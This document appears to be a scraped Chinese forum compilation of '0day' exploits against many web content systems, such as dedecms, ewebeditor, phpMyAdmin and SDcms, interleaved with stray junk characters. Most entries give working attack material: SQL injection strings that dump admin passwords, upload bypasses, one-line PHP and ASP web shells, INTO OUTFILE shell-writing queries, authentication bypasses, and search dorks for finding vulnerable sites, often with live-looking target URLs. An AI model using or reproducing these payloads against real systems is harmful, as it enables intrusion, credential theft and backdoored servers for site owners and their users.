0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本

- S9 N& d3 D& a直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( P) {+ I$ \- g4 ?  r) a& ]+ l5 m, SAsprain论坛 注册用户 上传图片就可拿到webshell
+ o  M. r8 t% \9 F8 R( N
  l- j' q, H4 H9 W0 rAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
5.q.asp;.gif
google：Powered by Asprain
: _5 u0 ]  v6 ^# }--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 C$ ]1 X6 q7 ]8 |- D5 W2 Q  N
: y) H9 H: Y* l5 M; D1 w6 O; t% @ShopNum1全部系统存在上传漏洞。
% ?- e6 i6 }# A) {. [
  c8 K  ]- \0 k! z+ z; s, w首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
# e7 T( ]) o& P% j2 @按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 E( O) H. |& N% u9 h4 I
牛牛CMS中小企业网站管理系统 上传漏洞

" p0 K4 l' C) F. l5 B, C, \, Q* h牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
" l- _$ @3 T2 a: R$ o9 m后台:admin/login.asp
ewebeditor 5.5 Nday
exp:
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
$ C  b6 s; ]) |4 Q5 d+ s<input?type=submit?value=upload>?
. q, {! Q$ e$ E# W</form>
ps:先上传小马.
0 A" {: W6 b0 x1 {# @inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

. M5 O& X. a8 |2 b5 |2 ^6 UYothCMS 遍历目录漏洞

( ?( M& ]6 {7 Q% P5 }优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台:admin/login.asp
遍历目录:
ewebeditor/manage/upload.asp?id=1&dir=../
data:
2 Y9 p; @! M% hhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! T" B- K3 f' Z9 O% b
Net112企业建站系统 1.0

源码简介：
9 L2 D4 c0 r7 F% m! X$ sNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
0 l8 x) \* t9 n1 M. V添加管理员：
http://www.0855.tv/admin/admin.asp?action=add&level=2
  D' X; b( X, R2 y. H$ P& j1 j1 T1 H其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
& m; |/ [4 x) m& Khttp://www.0855.tv/inc/Upfile.asp?Stype=2
4 N) Z# p4 Z! Y* ^, l* h怎么利用自己研究。
. u& a7 Y: T/ @5 H" x+ S, V遍历目录：
4 v0 u  m& F, {, e% d" Z9 b4 i& ghttp://www.0855.tv/admin/upfile.asp?path=../..
如：
http://www.0855.tv/admin/upfile.asp?path=../admin
http://www.0855.tv/admin/upfile.asp?path=../data
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

易和阳光购物商城通杀 上传漏洞

前提要求是IIS6.0+asp坏境。
- ~% t+ J8 X% B7 ~& i漏洞文件Iheeo_upfile.asp
3 Q  |7 X. u3 e* n! d7 I$ b3 z过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
直接放到明小子上传
. `2 M2 k# r' Y& V# G7 Z2 vGoogle搜索：inurl:product.asp?Iheeoid=
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin后台4种拿shell方法

5 O! F2 F; f6 H  D7 ]方法一：
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
, y/ f2 x4 w2 s' _4 B9 eINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
6 D* {4 u. S$ x& t0 G9 @* @1 wSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
1 F& Q0 B$ G7 m  j* d----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
1 S, Z' w, M% H* Y8 F4 o" r一句话连接密码：xiaoma
方法二：
; [* P% |  L/ V: W0 Y+ \Create TABLE xiaoma (xiaoma1 text NOT NULL);
+ o0 j, g* ~! h  Z* R2 {8 JInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
; U. i. S" y/ e% E4 e" E方法三：
( u0 P+ d  P, g8 \读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" m4 L! m0 N6 I/ [+ |7 ]$ V9 t$ B0 ~cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 d8 P' L; t6 l方法四：
7 R0 |6 }# ]' `( T5 ?! Q1 Eselect load_file('E:/xamp/www/xiaoma.php');
. g6 s# ^$ n! D: u3 Y* wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

3 `; c* p* x* }( }) J9 \# I传信网络独立开发网站源码0day漏洞
7 W# g& }# Q7 ]8 L$ ^* h
, [& o3 `- C- B后台system/login.asp
" J5 t5 Y8 A. Y1 f进了后台有个ewebeditor
Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
数据库ubbcode/db/ewebeditor.mdb
- h) x8 U+ n- T; X1 b  Q6 J默认账号密码yzm 111111

; x0 I1 P1 W1 q/ a拿webshell方法
登陆后台点击“样式管理”-选择新增样式
6 X2 r2 `0 F. ]7 F$ R" B$ Q样式名称:scriptkiddies 随便写
% N# R1 y- Q/ |5 Q! E! q% F: Z路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
& u, }# R' D  l  v, F  _上传路径：/
7 b3 D4 C( K* U" U: C' f图片限制：写上1000 免的上不了我们的asp木马
) ^9 u# M+ g' u- h( m3 }上传内容不要写
可以提交了
样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
4 P) w% F7 ^/ e( ^2 u' @2 P按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
; j3 e6 j& y7 e! C上ASP木马 回车 等到路径

后台：system/login.asp
9 Q& g# c7 W2 E+ \5 PExp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
" x# {3 @. Q: t# J2 Q* r测试:
  N& P4 T$ R) ?5 y6 G; Yhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: Q, ~( Y) U+ o& f
' ?$ Z( o% i9 |: Hfoosun 0day 最新注入漏洞

/ x- D) V5 ^4 I3 R漏洞文件：www.xxx.com/user/SetNextOptions.asp
利用简单的方法：
暴管理员帐号：
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码：
! a% R% D9 c! O% ]" f( ehttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# [1 O1 E2 e3 q, ^网站程序的版权未知！

默认网站数据库：
www.i0day.com/data/nxnews.mdb
ewebeditor 在线编辑器：
编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
( H- H5 \" F& W, V+ S登录地址：ewebeditor/admin_login.asp
* m- k  V% y9 v- I, }9 k0 y默认密码：admin  admin
登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

7 d- p: ?3 u0 N. E) @' PSql注入漏洞：
http://www.i0day.com/detail.asp?id=12
! F9 y, S$ X! nexp:
union select 1,admin,password,4,5,6,7,8 from admin
, m  j; V/ d1 g# k7 I爆出明文帐号/密码
$ T( ]9 r. I4 |/ L$ G; p* m
上传漏洞：
后台+upfile.asp
如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ w! s1 c# O  z6 L: oshell的地址：网址+后台+成功上传的马
3 i+ c4 c3 p2 f/ P3 h! p+ d( ~/ J- pgoogle:inurl:news.asp?lanmuName=
) P, p( j# A8 E------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 w2 n8 B/ u3 V; P0 n( k: }
dedecms最新0day利用不进后台直接拿WEBSHELL

1 O: l; L/ W: u( A( q' y拿webshell的方法如下：
: ^% _8 \( Z: Y# \网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
前题条件，必须准备好自己的dede数据库，然后插入数据：
: n" V0 s- m* ^$ c  dinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
2 D5 |+ ?1 M" e) M! P% E, V
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) ^3 H: c$ n# Q+ H( I/ N<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
9 g: V5 V3 d( z! Z9 q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
7 i! K3 z$ o( A1 K" V<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ W0 p5 y& Q; I: J. O5 k<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 H' e/ T. w  y( L2 e( D<input type="text" value="true" name="nocache" style="width:400">
$ p8 i# r! L# M3 z8 o<input type="submit" value="提交" name="QuickSearchBtn"><br />
" {$ q$ g( o" S1 r5 e# s</form>
<script>
function addaction()
, Z9 O& b7 O1 K8 ?  Y; X{
2 j; h8 P5 V- A2 U: y  }- R+ s% Zdocument.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
-----------------------------------------------------------------------------------------------------------------------------------------------

dedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
2 f$ o$ L$ a* C8 O& v1 _. g-------------------------------------------------------------------------------------------------------------------------------------------

多多淘宝客程序上传漏洞
漏洞页面：
9 M$ m; C) G; Vadmin\upload_pic.php
传送门：
. t( I9 d  I, T! p: o; h6 \/ f+ Rhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
PS:copy张图片马 直接  xxx.php 上传抓包地址！
------------------------------------------------------------------------------------------------------------------------------------------------------

无忧公司系统ASP专业版后台上传漏洞
' M4 f* s7 p; T5 o漏洞文件 后台上传
. ?% }0 c  F  Aadmin/uploadPic.asp
漏洞利用 这个漏洞好像是雷池的
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
; W* P" z* l) n& l. K* E& W等到的webshell路径：
8 h, O7 I, i! H/ y: J: Q+ e) @) I/UploadFiles/scriptkiddies.asp;_2.gif
---------------------------------------------------------------------------------------------------------------------------------------------------

住哪酒店分销联盟系统2010
Search：
inurl:index.php?m=hotelinfo
5 y+ v! J8 E7 r1 l2 D: y0 B3 Lhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
: m- W% b' H" l$ L7 t默认后台：index.php?m=admin/login
* O6 T. r# r: o$ E3 U: ~' p# P4 s--------------------------------------------------------------------------------------------------------------------------------------------------

* y) p: t  P2 jinurl:info_Print.asp?ArticleID=
后台 ad_login.asp
爆管理员密码：
# f" x( Y$ L$ @# iunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
! W1 `# U0 a4 s" F0 o+ k5 d------------------------------------------------------------------------------------------------------------------------------------------------------------

搜索框漏洞！
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------
( `- p# B; G9 W7 Q& l% p% i1 E' C
关键字：
inurl:/reg_TemletSel.asp?step=2
或者
; [# m4 O+ T& c电子商务自助建站--您理想的助手
! H; ^* [& N& c3 d$ [* S-------------------------------------------------------------------------------------------------------------------------------------------------

iGiveTest 2.1.0注入漏洞
/ B" p% y( e- R3 ~9 u, i3 j! fVersion: <= 2.1.0
3 P, K/ ^7 o( @- t# j9 l' X# Homepage: http://iGiveTest.com/
: ]2 K1 D4 K- G0 n  l谷歌关键字: “Powered by iGiveTest”
, D$ a. U0 e. m8 X0 C8 L; h随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------
8 `: f0 p9 @; q0 o* k
CKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
9 [, M" v- q8 m0 g  l# vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
! ?: e9 E5 [( M' p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

9 B; K2 d$ b2 f) t7 Z段富超个人网站系统留言本写马漏洞
源码下载：http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句话。
; }7 q0 q' u2 ~- @' \9 \+ f连接： http://www.xxxx.tv/date/date3f.asp
/ S" F. A; ]2 `( P0 S. c8 ugoogle:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ N* k* v; s) j# E" C
智有道专业旅游系统v1.0 注入及列目录漏洞
默认后台路径：/admin/login.asp
- N7 M% `6 q7 q( d4 d默认管理员：admin
0 r4 \3 s+ C- G' J  Y$ V- C默认密码：123456
* ]- V- T( V" Z% O* c9 ASQL EXP Tset:
* a; ^8 j; _6 V9 _% d/ @http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
4 n4 N" w* c" g$ [; z5 l. U------------------------------------------------------------------------------------------------------------------------------------------------------------------------

8 U3 {" N% X& m" H/ ~ewebeditor(PHP) Ver 3.8 本任意文件上传0day
1 ]. @' M% t9 g, Y/ G# _4 {EXP：
0 A% i  _. V) X, u0 V<title>eWebeditoR3.8 for php任意文件上EXP</title>
% [% F3 u" ]3 B7 |" x" Q<form action="" method=post enctype="multip
art/form-data">
' J3 J8 O) t7 V9 E6 o<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
, W  s$ ]- }6 R3 R& V: R! y! Wfile:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
7 X( N) m/ E2 b3 H7 g# V8 x</form><br>
<script>
; A6 g+ O8 @& S3 w1 G6 K+ `8 jfunction fsubmit(){
, z1 f5 i% y1 n3 u0 b+ m: Eform = document.forms[0];
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 N( K" b, I  ]alert(form.action);
) x4 H3 `4 l/ B1 zform.submit();
5 ]( B( o- |3 A% B- I) Y}
</script>
! [" ?+ P, D) b0 Q( d注意修改里面ewebeditor的名称还有路径。
4 `: [! C, l; X& |, J+ y3 n3 Z& L$ }---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& j6 G- j4 P( o1 l2 }1 V
. J1 W2 K+ w; y3 r  A" ~0 n提交’时提示ip被记录 防注入系统的利用
' ?" O0 s" ^4 Q* {网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, o! P6 _' Q- \5 W- ?$ K
西部商务网站管理系统 批量拿shell-0day
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
+ k7 q! `9 ]& e9 \% O1 g2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
+ K% E& w. r! X/ `4 G3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ |1 U$ h- G# X; R% I- P---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 s" U4 F: x) C4 a$ C6 Q
JspRun!6.0 论坛管理后台注入漏洞
) b1 f  ~) `0 X, O& A$ ^) Q. f6 w
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
: }* t+ @8 {- {8 X' E( UJspRun!6.0
1 p. j) O! m$ U) a漏洞描述:
# Z5 l; i% z% o  _/ IJspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
9 l1 D8 d! z; U在处理后台提交的文件中ForumManageAction.java第1940行
! K1 e+ p" e4 w" Z7 u; _0 O' TString export = request.getParameter("export");//直接获取，没有安全过滤
3 z) d2 K* I# c' k- V! Gif(export!=null){
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
# Q) c& R! ]8 T! g8 n# _# t  \5 }if(styles==null||styles.size()==0){
; Z0 I9 n4 B6 A( t# H- Y<*参考
. x1 C$ B" S5 I+ Dnuanfan@gmail.com
+ g) b4 e; l) |; N5 d, {( W*> SEBUG安全建议:
. h( H2 e) F7 P/ ~www.jsprun.net
2 K- @+ A3 x) @- x7 ?, F（1）安全过滤变量export
! c* _5 |6 F' l# J" O( o（2）在查询语句中使用占位符
  ^$ h* V  C  j. h. C- t! R$ d# e------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

乌邦图企业网站系统 cookies 注入
# S, U# V+ O# g5 ?. ?1 n- w
程序完整登陆后台:/admin/login.asp
默认登陆帐号:admin 密码:admin888
8 D( R* ~3 i8 d语句：(前面加个空格)
+ A3 w& x2 i' }0 c- i! ?. }$ D/ B! Eand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
6 e% \, _$ R$ J* L+ ~) u+ H$ u或者是16个字段：
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
注入点：http://www.untnt.com/shownews.asp?=88
4 F% I# P# l7 F& Mgetshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
( ]% ^* w/ K& P: N" J1 ~( [: n' R关键字：
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

6 U# w: d" e; ?1 A# q( ?# m" SCKXP网上书店注入漏洞

工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
/ i, M5 h; j3 a---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 @! @0 L' ?) u) G0 D( h
; J& z7 S8 ~' MYxShop易想购物商城4.7.1版本任意文件上传漏洞
" Y# J* {6 E+ A6 w
) A& E0 t% e! j- Rhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
4 Y4 f. Y$ R- H* ?# J跳转到网站根目录上传任意文件。
* }- Z2 y; R( y& x( A2 y如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
3 |& C4 A2 C7 Z<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
( Z. D9 p9 H& J  r9 K8 l5 z5 uUpload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
# G( v" p) H2 J) v<input id="btnUpload" type="submit" value="Upload">
</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

SDcms 后台拿webshell

% q; ^! }: Y0 s第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
+ ]( |) \4 h* L  {3 p7 n9 p2 P7 o1 u, v在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
8 @+ P/ ?6 e& y0 ]1 w) l6 g  |第三种方法：
进入后台-->界面管理-->模板文件管理-->创建文件
文件名写入getshell.ashx
内容写入下面内容：
0 j$ n" U9 D8 m9 N1 \3 d/ w  c/====================复制下面的=========================/
1 z* q( T( c! Z. k% u6 L- o<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
( M$ {: D  r" zpublic void ProcessRequest (HttpContext context) {
/ {) @" |1 z) _/ o1 _8 ?! qcontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
! Z4 n  y' M/ e' pfile1.Flush();
6 \% s. D% E. U+ y  {7 T0 ]file1.Close();
}
0 P9 T  H* h& dpublic bool IsReusable {
get {
) E3 v' v, B4 ^1 f) g+ G) ureturn false;
0 ^' z, H" q4 A1 ]  g8 ?}
}
0 X3 G& G6 `, u9 U, }' V}
/=============================================/
3 w9 e' |0 m! \+ K" p+ @7 e9 z访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
; s; M% c7 C* z& }% a5 f+ o" K会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* m$ I* L' _) q& H
ESCMS网站管理系统0day

3 S! y8 N; R/ X' _6 m2 v" G后台登陆验证是通过admin/check.asp实现的
: X; ]3 \2 j: j: q1 G
) T& m* b$ P7 W0 j+ k6 x* f+ r: h首先我们打开http://target.com/admin/es_index.html
然后在COOKIE结尾加上
; ESCMS$_SP2=ES_admin=st0p;
* {2 ?+ ]; x& C  k, _& R) a修改,然后刷新
进后台了嘎..
$ D- C' y+ c1 s2 q' F然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

+ p/ k, x- J1 i* X% z利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
. P8 O( Z2 u: n  G% e8 V* K" g嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
  k, ?' q/ e5 G" M1 D: y) |存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% s3 b1 V; O) J# K" v5 a) N& x8 q
2 r2 z: Z- _4 j宁志网站管理系统后台无验证漏洞及修复

% _: A+ z  K5 f网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
学校网站管理系统 V.2011版本
( Y7 F: U, @2 e, e: Y* Jhttp://down.chinaz.com/soft/29943.htm
; t; U7 F$ K+ z9 W其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
( N! B  o1 m- i4 f  Hlogin.asp代码如下:
<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
2 [( h% S' r+ F+ }, Pmanage.asp代码我就不帖出来了.反正也没验证.
  [3 T8 G: _% B9 w+ v只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
漏洞利用:
直接访问http://www.0855.tv/admin/manage.asp
! {, D) F, A( u  M+ X数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin拿shell的四种方法总结及修复

方法一：
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
: z+ }4 _/ l! fINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on
方法二：
读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
9 V" G0 T  ?4 a' C9 }. S2 ~cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三：
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
! n' \  e7 d) b: {4 `Drop TABLE IF EXISTS study;
<?php eval($_POST[cmd])?>
/ q- m" S1 \1 ~2 s. V* ?CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
. U1 U* W$ o0 e& U% c( x6 ~+ U( O/ uDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
( L' N0 n$ ]* Y' l2 d方法四：
. T- o) N, y; ~5 [. n# P7 ]select load_file('E:/xamp/www/study.php');
8 f& J5 t" r# W( Z4 X" T+ Tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
8 p2 v2 H2 }' t/ F5 u-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

NO.001中学网站管理系统 Build 110628 注入漏洞

6 z7 B. ?% F6 P1 a  RNO.001中学网站管理系统功能模块:
7 q$ m4 F6 f( \1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
: R2 t6 b3 t1 u" E/ [# V5 s2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
